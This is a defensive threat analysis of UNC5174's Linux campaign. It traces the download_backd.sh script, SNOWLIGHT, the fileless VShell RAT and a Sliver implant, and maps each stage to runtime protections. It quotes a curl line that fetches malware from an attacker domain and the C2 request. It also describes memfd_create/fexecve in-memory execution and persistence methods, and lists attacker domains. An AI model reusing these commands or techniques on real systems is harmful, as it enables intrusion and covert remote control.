UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell

This security issue gives an attacker the ability to infiltrate systems using a multi-stage malware deployment, leveraging tools like SNOWLIGHT and VShell. The following protection guardrails can further prevent the following steps an attacker can take: If an attacker attempts to execute their initial malicious bash script, download_backd.sh, from an unauthorized location such as /tmp, Process Path Exec Allow prevents its execution. Should this script then try to use a utility like curl to download subsequent malware payloads such as dnsloger (SNOWLIGHT) or system_worker (Sliver), Process Exec Deny can block curl's execution if it's on a deny list, for instance, due to its path ending in /curl. Furthermore, Process Socket Deny is critical in preventing the curl process, or the malware itself like dnsloger, from making outbound network connections to download additional payloads like the VShell RAT or to establish command and control with servers such as vs[.]gooogleasia[.]com or sex666vr[.]com. When the attacker's script attempts to establish persistence by modifying critical system files, for example by creating crontab entries or systemd service files for dnsloger and system_worker, Sensitive File Access detects and blocks these unauthorized changes, and can later prevent the VShell or Sliver implants from accessing sensitive data like SSH keys during espionage attempts. If the attack occurs within a containerized environment, Container Drift Protection (Binaries & Scripts) would block the execution of the initial script if it wasn't part of the original image, and crucially, prevent the fileless VShell RAT, even when disguised as [kworker/0:2], from running as it's an unrecognized binary. Finally, as the VShell RAT or Sliver implant attempts to establish command and control, potentially by binding shell input/output to a network socket for interactive remote access, Reverse Shell Protection blocks such reverse shell activity, neutralizing the attacker's ability to directly control the compromised system.

• T1059.004: Command and Scripting Interpreter: Unix Shell: The attacker utilized a malicious bash script to download multiple executable files for persistence. This technique is associated with T1059.004 - Command and Scripting Interpreter: Unix Shell, as the script was responsible for executing commands to download and set up the malware.
• T1566: Phishing: The attacker used domain squatting to create fake domains that impersonate legitimate companies, likely for phishing and social engineering. This aligns with T1566 - Phishing, as it involves deceiving users into interacting with malicious domains.
• T1203: Exploitation for Client Execution: The SNOWLIGHT malware acts as a dropper for a fileless payload, which is indicative of T1203 - Exploitation for Client Execution, as it exploits systems to execute the payload in memory without writing to disk.
• T1055: Process Injection: The VShell payload operates entirely in memory, indicating the use of T1055 - Process Injection, as it involves injecting code into processes to evade detection and execute in memory.
• T1071.001: Application Layer Protocol: Web Protocols: The attacker used WebSockets for command and control, which corresponds to T1071.001 - Application Layer Protocol: Web Protocols, as it involves using web protocols for communication with the C2 server.
• T1543.002: Create or Modify System Process: Systemd Service: The malware establishes persistence by configuring malicious binaries to run at startup via systemd or init.d, aligning with T1543.002 - Create or Modify System Process: Systemd Service, as it involves setting up services to maintain persistence.
• T1589: Gather Victim Identity Information: The use of custom and open source tools like VShell and SNOWLIGHT for espionage and access brokering suggests T1589 - Gather Victim Identity Information, as it involves collecting information for further exploitation or selling access.

F1: UNC5174's new campaign (post-January 2025) on Linux systems, involving initial script execution, deployment of SNOWLIGHT malware, which then downloads and executes the VShell RAT in-memory using fileless techniques, and establishes C2 communication via WebSockets.

• Attacker gains initial access to a Linux-based system. The exact method for this campaign is unclear. (Cited from: "Although it is unclear what UNC5174 is using for initial access in this campaign, it is targeting Linux-based systems.")
• A malicious bash script, download_backd.sh, is executed on the compromised system. (Cited from: "Following initial access, a malicious bash script drops two payloads: dnsloger (associated with SNOWLIGHT malware) and system_worker (associated with Sliver and Cobalt Strike).")
  • BR-54: Container Drift Protection (Binaries & Scripts) - If this software ran inside a container, then this mechanism applies because it prevents the execution of new scripts like download_backd.sh if it was not part of the original container image at load time.
  • BR-62: Linux/Host Drift Protection - This mechanism applies because it would block the execution of download_backd.sh if this script was added to the system outside of a trusted package manager after boot and then executed.
  • BR-88: Process Path Exec Allow - This mechanism applies because it would prevent the execution of the download_backd.sh script if it is initially run from a path not on the execution allowlist (e.g., /tmp or a user-writable directory, as implied by later steps where files are kept in /tmp if not root).
• The download_backd.sh script downloads two primary executables: dnsloger (SNOWLIGHT malware) and system_worker (Sliver/Cobalt Strike implant) from a C2 server, e.g., http://gooogleasia.com:8080/download_$executable. (Cited from: "This is the original bash script responsible for downloading and executing the dnsloger and systemworker binaries.", "curl -sL "http://gooogleasia.com:8080/download$executable" -o "/tmp/$executable"")
  • BR-87: Process Socket Deny - This mechanism applies because it could prevent the curl process (executed by the download_backd.sh script) from initiating an outgoing network connection to http://gooogleasia.com:8080 if curl or the C2 destination is not on the allow list.
  • BR-90: Process Exec Deny - This mechanism applies because curl (invoked by the script as curl -sL ...) is a process whose execution can be denied if its path ends with '/curl' (a default denied suffix). If curl execution is blocked, the download of dnsloger and system_worker would fail.
• The script verifies the MD5 hashes of the downloaded executables and attempts to re-download them if the hashes do not match. (Cited from: "The shell script contains various functions to verify if the malicious executables dropped correspond to the expected MD5 hashes. If they do not, the script attempts to re-download them.")
  • BR-87: Process Socket Deny - This mechanism applies because if re-download is attempted via curl, it could prevent the curl process from initiating an outgoing network connection if curl or the C2 destination is not on the allow list.
  • BR-90: Process Exec Deny - This mechanism applies because if curl is used for re-download and its execution is denied (e.g. path ending in '/curl'), the re-download would fail.
• If the script is running as root, it moves the downloaded executables (dnsloger, system_worker) to /usr/bin/. Otherwise, they are kept in /tmp/. (Cited from: "When running as root, the script moves the executable to /usr/bin/", "If it is not, it keeps the downloaded executable in /tmp.")
  • BR-75: Critical Directory Write Protection - This mechanism applies because if /usr/bin/ is configured as a critical directory, any write attempt (like moving the malware executables dnsloger and system_worker there) by the script would be blocked, as this mechanism blocks any writes to specified critical directories from any process.
• The download_backd.sh script establishes persistence for dnsloger and system_worker by adding them to crontab (for hourly execution and execution on reboot) and configuring them as systemd or init.d services. (Cited from: "For persistence, the script abuses crontab by adding the executables to ensure they run every hour and after reboots", "The script configures two malicious binaries, dnsloger and system_worker, to run at startup via systemd (newer systems) or init.d (older systems).")
  • BR-75: Critical Directory Write Protection - This mechanism applies because if the directories for crontab configurations (e.g., /etc/cron.d/, /var/spool/cron/) or systemd/init.d service files (e.g., /etc/systemd/system/, /etc/init.d/) are designated as critical, this mechanism would block the malicious script from writing new service or cron files into them.
  • BR-91: Sensitive File Access - This mechanism applies if the specific crontab files (e.g. /etc/crontab) or systemd service definition files being created or modified are on the sensitive file list, as it would detect or block unauthorized modifications to these critical configuration files.
• The dnsloger (SNOWLIGHT) executable, once running, connects to its hardcoded C2 server vs[.]gooogleasia[.]com. (Cited from: "Analyzing the malware with radare2...reveals that some parameters and filenames are hardcoded. For instance...the C2 server, vs[.]gooogleasia[.]com.")
  • BR-87: Process Socket Deny - This mechanism applies by preventing the dnsloger process from initiating an outgoing network connection to vs[.]gooogleasia[.]com if the dnsloger process itself or the C2 destination is not on the configured allow list.
• dnsloger sends an HTTP GET request (e.g., GET /?a=l64&h=vs.gooogleasia.com&t=ws_&p=8443 HTTP/1.1) to its C2 server to download the VShell RAT payload. (Cited from: "The dnsloger (SNOWLIGHT) binary downloads the VShell binary through a carefully crafted GET request to the C2 server.", "sendto res=1024 data=GET /?a=l64&h=vs.gooogleasia.com&t=ws_&p=8443 HTTP/1.1..Host: vs.gooogleasia.... A")
  • BR-87: Process Socket Deny - This mechanism applies by preventing the dnsloger process from initiating the outgoing HTTP GET request to vs[.]gooogleasia[.]com if the process or the destination is not on the allow list.
• The received VShell payload data is XOR-decoded with the key 0x99. (Cited from: "The malware then waits to receive data from the server and XORs the data with 0x99, suggesting an attempt to obfuscate or encrypt the content before processing it.")
• dnsloger uses the memfd_create system call to create an anonymous file descriptor in memory (e.g., named 'a') for the VShell payload. (Cited from: "It is created through the memfdcreate (syscall 0x13f) by its dropper, SNOWLIGHT, in this campaign.", "< memfdcreate fd=4(<m>a) name=a flags=1(MFD_CLOEXEC)")
  • BR-83: Syscall Deny Filter - This mechanism applies because the step explicitly mentions the memfd_create system call (syscall 0x13f). If memfd_create is on the deny list for the dnsloger process, its execution would be blocked, preventing the creation of the in-memory file for VShell. memfd_create is not one of the syscalls this mechanism will never block.
  • BR-85: Ephemeral Filesystem Behavior Analysis - This mechanism applies because memfd_create is used to create a file in a memory-backed filesystem. This activity is a key indicator monitored by BR-85, and an alert would be generated. Subsequent execution from this memory-backed file (as in step F1.11) would also be detected.
• dnsloger executes the VShell payload directly from the memory file descriptor using the fexecve system call, disguising the VShell process name as [kworker/0:2]. (Cited from: "It is disguised as a system process ([kworker/0:2]) and executed through fexecve syscall", "fexecve(iVar3,&local_1c48,environ);" where local_1c48 = "[kworker/0:2]")
  • BR-54: Container Drift Protection (Binaries & Scripts) - If this software ran inside a container, then this mechanism applies because VShell, executed from memory as [kworker/0:2], is a new executable binary not present in the original container image manifest and its execution would be blocked.
  • BR-62: Linux/Host Drift Protection - This mechanism applies because the VShell payload is executed from memory and was not installed via a trusted package manager. It represents drift from the baseline of code installed via trusted package managers and its execution would be blocked.
  • BR-80: Tainted File Download Protection - This mechanism applies because the VShell payload (compiled code) was fetched over the network by dnsloger (in step F1.8) and is now being executed by dnsloger via fexecve. This matches the pattern of downloading code and subsequently executing it.
  • BR-85: Ephemeral Filesystem Behavior Analysis - This mechanism applies because VShell is being executed from a memory-backed file descriptor (created via memfd_create in step F1.10). Execution from memory-backed filesystems like those created by memfd_create is a key indicator monitored by BR-85.
  • BR-55: Reverse Shell Protection - This mechanism applies because VShell is a Remote Access Trojan (RAT) designed for remote access and control, which implies it can establish an interactive command and control session. If this involves binding shell STDIN/STDOUT/STDERR to the network socket, BR-55 would block this.
• The fileless VShell RAT establishes Command and Control (C2) communication with vs[.]gooogleasia[.]com on port 8443 by upgrading an HTTP connection to a WebSocket connection. (Cited from: "The presence of the Upgrade: websocket and Connection: Upgrade headers in the write data shows that the process is attempting to upgrade from an HTTP connection to a WebSocket connection to the server at vs[.]gooogleasia[.]com on port 8443.")
  • BR-87: Process Socket Deny - This mechanism applies by preventing the VShell process (disguised as [kworker/0:2]) from initiating or maintaining an outgoing network connection to vs[.]gooogleasia[.]com if the VShell process itself or the C2 destination is not on the configured allow list.
  • BR-55: Reverse Shell Protection - This mechanism applies as the VShell RAT is establishing C2, a form of remote command and control. If this C2 communication facilitates interactive shell access by binding shell file descriptors to the network socket, BR-55 would detect and block it.
• VShell performs memory mapping operations (mmap/mmap2) to allocate large, anonymous memory regions with PROT_NONE protection, possibly for future payload injection. (Cited from: "It performs multiple memory mappings (mmap and mmap2 system calls), with fd=-1 (indicating no file descriptor) combined with flags like MAPPRIVATE | MAPANONYMOUS.", "Some of these mappings are huge (e.g., 64MB, 128MB, 512MB) and are allocated with PROT_NONE protection")

​

F2: Parallel deployment and operation of a Sliver C2 implant (system_worker) by UNC5174 in its new campaign, providing an alternative C2 channel using secure protocols.

• Following initial access to a Linux system, the download_backd.sh script downloads the system_worker executable, identified as a Sliver implant. (Cited from: "Following initial access, a malicious bash script drops two payloads: dnsloger (associated with SNOWLIGHT malware) and systemworker (associated with Sliver and Cobalt Strike).", "The downloaded executable systemworker was categorized as Sliver malware on VT")
  • BR-87: Process Socket Deny - This mechanism applies because it could prevent the curl process (executed by download_backd.sh) from initiating an outgoing network connection to download system_worker if curl or the C2 destination is not on the allow list.
  • BR-90: Process Exec Deny - This mechanism applies because curl is a default denied process. If download_backd.sh attempts to execute curl (e.g. path ending in '/curl') to download system_worker, its execution would be blocked.
• The system_worker binary is UPX-packed and obfuscated using gobfuscate. (Cited from: "It is both UPX-packed and obfuscated with gobfuscate.")
• Persistence for system_worker is established by the download_backd.sh script using crontab and systemd/init.d services, similar to dnsloger. (Cited from: "For persistence, the script abuses crontab by adding the executables to ensure they run every hour and after reboots", "The script configures two malicious binaries, dnsloger and system_worker, to run at startup via systemd (newer systems) or init.d (older systems).")
  • BR-75: Critical Directory Write Protection - This mechanism applies because if directories for crontab or systemd/init.d service files are designated as critical, this mechanism would block the script from writing new service/cron files for system_worker.
  • BR-91: Sensitive File Access - This mechanism applies if the specific crontab files or systemd service files being modified for system_worker are on the sensitive file list, as it would detect or block unauthorized modifications.
• The executed system_worker (Sliver) implant establishes C2 communication with multiple subdomains hosted at sex666vr[.]com and gooogleasia[.]com. (Cited from: "Analyzing the runtime behavior of system_worker logs showed that this binary reaches out to multiple C2 subdomains hosted at sex666vr[.]com", "wg.gooogleasia.com")
  • BR-87: Process Socket Deny - This mechanism applies by preventing the system_worker (Sliver implant) process from initiating outgoing network connections to its C2 domains (e.g., sex666vr[.]com, gooogleasia[.]com) if the system_worker process or the destinations are not on the allow list.
  • BR-55: Reverse Shell Protection - This mechanism applies because the Sliver implant (system_worker) is establishing C2 communication for remote control. If this involves interactive shell capabilities over the socket, BR-55 is designed to prevent the binding of shell file descriptors to the network socket.
• The Sliver implant utilizes secure communication protocols for its C2 channels, including mutual TLS (mTLS), WireGuard, and HTTPS, as indicated by accessed subdomains like mtls.sex666vr.com. (Cited from: "More specifically, the binary uses secure communication channels typical of Sliver implants, including mutual TLS (mTLS), WireGuard, and HTTPS. These protocols can be seen in the subdomains mentioned.")
  • BR-87: Process Socket Deny - This mechanism applies by preventing the system_worker (Sliver implant) process from establishing these secure C2 connections if the process or the destinations are not on the allow list.

​

F3: UNC5174's C2 infrastructure setup and maintenance, involving domain squatting to impersonate legitimate companies for phishing and hosting malware components.

• UNC5174 registers and uses C2 domains like gooogleasia[.]com and sex666vr[.]com. (Cited from: "In this campaign, we observed new C2 domains: gooogleasia[.]com (with no affiliation to Google) sex666vr[.]com")
• The actor employs domain squatting techniques, impersonating known companies (e.g., Google, Cloudflare, Telegram, Huione Pay) with domains such as gooogleasia[.]com, c1oudf1are[.]com, telegrams[.]icu, and huionepay[.]me. (Cited from: "Domain squatting was likely used for phishing purposes.", "The domains are predominantly impersonating known companies, with the most recent instance spoofing Cloudflare.", "These include: telegrams[.]icu (plausibly impersonating Telegram) huionepay[.]me (plausibly impersonating Huione Pay) c1oudf1are[.]com (plausibly impersonating Cloudflare)")
• These domains are hosted on infrastructure such as Google Compute Engine (GCE) virtual machines, with IP addresses changing over time (e.g., gooogleasia[.]com resolved to 34[.]96[.]239[.]183 and later 34[.]96[.]252[.]230). (Cited from: "The domain gooogleasia[.]com was created on Sept. 1, 2023, and as of Jan. 16, 2025, it resolved to the IP address 34[.]96[.]239[.]183. We resolved this to an IP host name located in Hong Kong for a Google Compute Engine (GCE) virtual machine.", "During the investigation, we’ve noticed that a new IP started to host gooogleasia[.]com and its subdomains: 34[.]96[.]252[.]230, changed on February 21, 2025.")
• Multiple subdomains are utilized, some incorporating other brand names (e.g., login[.]microsoftonline[.]gooogleasia[.]com), and are used for C2 operations for SNOWLIGHT (e.g., vs[.]gooogleasia[.]com) and Sliver/Cobalt Strike (e.g., evil[.]gooogleasia[.]com, mtls.sex666vr[.]com). (Cited from: "These domains have multiple subdomains, some of which have other brand names, such as login[.]microsoftonline[.]gooogleasia[.]com.", "MalTrail also classifies several subdomains of gooogleasia[.]com as Cobalt Strike C2s.")
• This infrastructure is assessed to be used for phishing and social engineering to facilitate initial access. (Cited from: "We assess with high confidence that the new infrastructure aligns with domain squatting, likely employed for phishing and social engineering.")

​

F4: UNC5174's earlier (November 2024) campaign variation using SNOWLIGHT to drop VShell, featuring similar TTPs but different C2 infrastructure (googlespays[.]com).

• In November 2024, UNC5174 deployed a SNOWLIGHT malware variant. (Cited from: "we found that the first sample dropping a VShell binary in the same fashion we observed with our newest binary was first detected in November 2024.")
• This SNOWLIGHT variant acted as a dropper for a VShell binary. (Cited from: "the first sample dropping a VShell binary...was first detected in November 2024.")
  • BR-80: Tainted File Download Protection - This mechanism applies if the SNOWLIGHT variant downloaded the VShell binary (compiled code) over the network and VShell was subsequently executed. The step describes SNOWLIGHT acting as a dropper, implying download and subsequent execution.
  • BR-87: Process Socket Deny - If SNOWLIGHT downloaded VShell over the network, this mechanism could apply by preventing SNOWLIGHT from making the necessary socket connection if SNOWLIGHT or the C2 was not on the allow list.
• SNOWLIGHT executed the VShell payload in memory, with the VShell process mascarading under the name [kworker/0:2]. (Cited from: "SNOWLIGHT malware, when executing and downloading in memory, uses the name “[kworker/0:2].”", "using this query: behaviour_processes:"/memfd:a (deleted)/ [kworker/0:2]"")
  • BR-54: Container Drift Protection (Binaries & Scripts) - If this execution occurred within a container, this mechanism applies because VShell, executed from memory as [kworker/0:2], is a new binary not in the original image and its execution would be blocked.
  • BR-62: Linux/Host Drift Protection - This mechanism applies as VShell is executed from memory and not installed via a trusted package manager, representing drift that would be blocked.
  • BR-85: Ephemeral Filesystem Behavior Analysis - This mechanism applies as executing a payload from memory (implied by /memfd:a (deleted)/) like VShell, especially when disguised as a kernel worker, is a key indicator of fileless execution that BR-85 monitors and alerts on.
  • BR-55: Reverse Shell Protection - This mechanism applies as VShell is a RAT. If its execution as [kworker/0:2] involves establishing an interactive C2 shell by binding shell FDs to network sockets, BR-55 would block this.
• The VShell binary used in this November 2024 campaign established C2 communication via the WebSocket protocol. (Cited from: "The November 2024 VShell binary also uses a WebSocket protocol")
  • BR-87: Process Socket Deny - This mechanism applies by preventing the VShell process from establishing the WebSocket C2 connection if the VShell process or the C2 destination is not on the allow list.
  • BR-55: Reverse Shell Protection - This mechanism applies if the WebSocket C2 communication facilitates interactive shell-like remote control, by preventing the binding of shell FDs to the socket.
• The C2 communication for this VShell instance was directed to the domain apib[.]googlespays[.]com. (Cited from: "The November 2024 VShell binary also uses a WebSocket protocol over the C2 domain apib[.]googlespays[.]com")
  • BR-87: Process Socket Deny - This mechanism applies by preventing the VShell process from connecting to apib[.]googlespays[.]com if this destination is not on the allow list.
• The primary C2 domain for this earlier campaign was googlespays[.]com, also impersonating Google. (Cited from: "This led to the discovery of additional UNC5174 C2 infrastructure from November 2024: googlespays[.]com. The Google brand impersonation matches the pattern of the current C2 domain")

​

F5: Historical UNC5174 TTP: Exploitation of Ivanti Cloud Service Appliance (CSA) products.

• UNC5174 targets Ivanti Cloud Service Appliance (CSA) products. (Cited from: "UNC5174 exploited Ivanti’s Cloud Service Appliance (CSA) products during the 2024 Summer Olympics.")
• The actor exploits vulnerabilities in these Ivanti CSA products to gain unauthorized access. (Cited from: "UNC5174 exploited Ivanti’s Cloud Service Appliance (CSA) products during the 2024 Summer Olympics.")
• This access is then used for further malicious activities, as observed during the 2024 Summer Olympics. (Cited from: "UNC5174 exploited Ivanti’s Cloud Service Appliance (CSA) products during the 2024 Summer Olympics.")

​

F6: Historical UNC5174 TTP: Phishing with malicious email attachments.

• UNC5174 conducts phishing campaigns. (Cited from: "According to SOCRadar, this threat actor also leveraged phishing with malicious email attachments to deliver their malware in 2019.")
• Malicious email attachments are used as the delivery vector for their malware. (Cited from: "this threat actor also leveraged phishing with malicious email attachments to deliver their malware in 2019.")
• This technique was observed being used by UNC5174 in 2019. (Cited from: "in 2019.")